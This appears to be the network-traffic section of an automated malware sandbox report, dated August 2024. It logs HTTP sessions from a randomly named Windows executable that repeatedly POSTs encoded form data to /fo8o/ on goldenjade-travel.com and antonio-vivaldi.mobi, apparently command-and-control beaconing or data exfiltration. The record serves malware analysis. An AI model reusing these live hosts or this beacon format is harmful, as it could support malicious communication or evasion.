            Data Raw: 31 30 64 33 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 70 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 21 2d 2d 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 39 5d 3e 0a 09 3c 73 74 [TRUNCATED]
            Data Ascii: 10d3<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>403 Forbidden</title><link rel="stylesheet" type="text/css" href="/style.css">...<meta name="robots" content="noindex" />-->...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]-->... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MLXKCD66');</script>... End Google Tag Manager --></head>...<body class="blackboard">--><body class="tokyo1">... Google Tag Manager (noscript) --><noscript><iframe src="https://www.googletagmanager.com/ns.htm [TRUNCATED]
            Aug 2, 2024 13:51:16.663844109 CEST1236INData Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e
            Data Ascii: yle="display:none;visibility:hidden"></iframe></noscript>... End Google Tag Manager (noscript) --><a href="https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886" target="_blank" class="bnrLink"><img src="https:/
            Aug 2, 2024 13:51:16.664000034 CEST1236INData Raw: 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 5f 61 72 65 61 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 61 6b 6b 6f 6d 61 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63
            Data Ascii: <div class="img_area"><a href="https://rakkoma.com/" target="_blank"><img src="/img/rakko_img01.png" alt="M&A"></a><a href="https://rakkoma.com/" target="_blank"><img src="/img/rakko_img02.png" alt="
            Aug 2, 2024 13:51:16.664016008 CEST793INData Raw: 29 3b 0a 09 24 28 22 62 6f 64 79 20 68 65 61 64 65 72 22 29 2e 66 69 74 54 65 78 74 28 35 2e 36 2c 20 7b 20 6d 69 6e 46 6f 6e 74 53 69 7a 65 3a 20 27 38 70 78 27 2c 20 6d 61 78 46 6f 6e 74 53 69 7a 65 3a 20 27 32 34 70 78 27 20 7d 29 3b 0a 3c 2f
            Data Ascii: );$("body header").fitText(5.6, { minFontSize: '8px', maxFontSize: '24px' });</script>...[if lt IE 9]><script src="/FitText.js-master/html5.js"></script><![endif]--><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]
            Aug 2, 2024 13:51:16.665667057 CEST1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:51:16 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Data Raw: 31 30 64 33 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 70 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 21 2d 2d 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 39 5d 3e 0a 09 3c 73 74 [TRUNCATED]
            Data Ascii: 10d3<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>403 Forbidden</title><link rel="stylesheet" type="text/css" href="/style.css">...<meta name="robots" content="noindex" />-->...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]-->... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MLXKCD66');</script>... End Google Tag Manager --></head>...<body class="blackboard">--><body class="tokyo1">... Google Tag Manager (noscript) --><noscript><iframe src="https://www.googletagmanager.com/ns.htm [TRUNCATED]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.649728116.50.37.244805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:22.062978029 CEST804OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.goldenjade-travel.com
            Origin: http://www.goldenjade-travel.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.goldenjade-travel.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64
            Data Ascii: blWd=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad
            Aug 2, 2024 13:51:22.977735996 CEST492INHTTP/1.1 404 Not Found
            Content-Type: text/html; charset=us-ascii
            Server: Microsoft-HTTPAPI/2.0
            Date: Fri, 02 Aug 2024 11:51:21 GMT
            Connection: close
            Content-Length: 315
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.649729116.50.37.244805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:24.605706930 CEST828OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.goldenjade-travel.com
            Origin: http://www.goldenjade-travel.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.goldenjade-travel.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 4c 69 58 32 4d 73 42 35 37 30 4d 56 38 76 32 42 49 49 68 41 6c 2b 38 2b 42 70 78 61 52 6b 2f 44 62 30 6e 74 44 6e 41 5a 64 45 59 67 3d 3d
            Data Ascii: blWd=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwLiX2MsB570MV8v2BIIhAl+8+BpxaRk/Db0ntDnAZdEYg==
            Aug 2, 2024 13:51:25.497365952 CEST492INHTTP/1.1 404 Not Found
            Content-Type: text/html; charset=us-ascii
            Server: Microsoft-HTTPAPI/2.0
            Date: Fri, 02 Aug 2024 11:51:25 GMT
            Connection: close
            Content-Length: 315
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            7192.168.2.649730116.50.37.244805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:27.144884109 CEST1841OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.goldenjade-travel.com
            Origin: http://www.goldenjade-travel.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.goldenjade-travel.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 78 78 5a 52 42 6e 6e 4f 6d 38 30 5a 50 75 46 57 32 35 57 38 33 63 2f 75 7a 74 41 38 6f 49 79 36 5a 78 35 31 51 37 47 6b 34 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 57 45 4f 78 51 32 58 67 70 56 6f 63 78 76 32 57 77 2b 4b 4d 2b 33 71 61 42 6f 69 6c 59 36 74 46 42 74 67 56 56 49 78 73 33 66 6b 30 51 50 58 72 61 68 39 70 4c 53 54 37 41 78 58 65 4c 63 70 74 74 44 61 36 75 65 43 48 54 68 55 66 34 45 37 54 4a 49 [TRUNCATED]
            Data Ascii: blWd=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xLxxZRBnnOm80ZPuFW25W83c/uztA8oIy6Zx51Q7Gk4SYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuWEOxQ2XgpVocxv2Ww+KM+3qaBoilY6tFBtgVVIxs3fk0QPXrah9pLST7AxXeLcpttDa6ueCHThUf4E7TJI6J0begpvdJJcJDMI7f9ZZvplcBtpJFkNRdcTUOp8UhyoQzN3uRn068E7b8T3fWdLG9xYgp1jaiB4QpVWhwWcgek2BPOP8VpQEsmp/aDoZQTnrp54Hp/Mz08dCnVpVz3UHzmev89AuG9CmN+dbrlVUt6LQQY6s3P8m0frWTXfkLTpcQVpCpvC0S/C+Ksq48VMlvhGhD56zinvfxhkCYTpVQzisTzii5ItAaAWzu7x2pD0AbLVYN4RZJo40N4oftACttlMTTbK/tkbduINwDrKC5GB1El2qE4KpU95OIfm4uqZGt2pOu77F0rioMP+LO43oShjrJy02G5PqBZhRSLFLg9JBha1JlR98tj/YPg9nYCHaYpZcse4vZQQuha+fUtHvDtsDkkAbaid5otVHEYxGOhPD/6OwgxWPuX3yyxek4UDhtumKvbvtYC552ZLFYKSsziJLU3oUdUuGszAt0tkWFwApTIJ+cHgNSqzRv6mL+TH8VAfBAkXPQnCgyvc81hxT5sdh8TkYQm6BCAWAVGAaVTkuED+LfGlGqaMnYmgC6CZZMRIBw+GzlpkVeSq5pdNiOCraYcno2YW+9rtBOGsQAqK39E/d8J3cb0Hn5SgLK4WxrOwZzu+uGTHJdDkNRUxsRIX8AVEa5YbRof3w1KR7N6TOVIylTxWyC [TRUNCATED]
            Aug 2, 2024 13:51:28.047764063 CEST492INHTTP/1.1 404 Not Found
            Content-Type: text/html; charset=us-ascii
            Server: Microsoft-HTTPAPI/2.0
            Date: Fri, 02 Aug 2024 11:51:27 GMT
            Connection: close
            Content-Length: 315
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            8192.168.2.649733116.50.37.244805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:29.675618887 CEST532OUTGET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.goldenjade-travel.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:51:30.591144085 CEST492INHTTP/1.1 404 Not Found
            Content-Type: text/html; charset=us-ascii
            Server: Microsoft-HTTPAPI/2.0
            Date: Fri, 02 Aug 2024 11:51:30 GMT
            Connection: close
            Content-Length: 315
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            9192.168.2.64973446.30.211.38805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:35.641633034 CEST801OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.antonio-vivaldi.mobi
            Origin: http://www.antonio-vivaldi.mobi
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.antonio-vivaldi.mobi/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 6b 52 35 38 65 32 62 58 69 70 4f 6a 51 67 39 6e 58 49 5a 50 54 73 6a 6b 6e 6c 36 6b 56 4e 59 54 70 6e 41 61 59 37 75 74 36 56 71 57 44 58 49 4f 36 55 6f 74 53 70 6f 38 4f 56 2f 4e 4e 5a 53 39 32 39 6e 4c 43 63 50 43 44 48 4a 65 37 35 51 32 66 46 4f 70 35 50 7a 68 78 53 4f 58 48 69 4e 78 6d 7a 61 6d 6d 45 2f 4a 74 73 59 39 32 6c 49 62 39 6e 41 55 2b 67 6e 51 41 4b 75 6e 65 53 4e 74 6e 30 74 57 37 64 63 49 2f 48 79 63 76 4b 62 52 33 31 30 4f 6e 68 4a 69 6a 43 47 38 4c 6f 4d 33 48 36 62 50 47 72 41 6e 64 56 48 69 4e 7a 7a 49 72 37 43 74 30 2b 76 58 4f 4a 73 55 63 48 34 70
            Data Ascii: blWd=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OnhJijCG8LoM3H6bPGrAndVHiNzzIr7Ct0+vXOJsUcH4p
            Aug 2, 2024 13:51:36.306050062 CEST738INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Fri, 02 Aug 2024 11:51:36 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
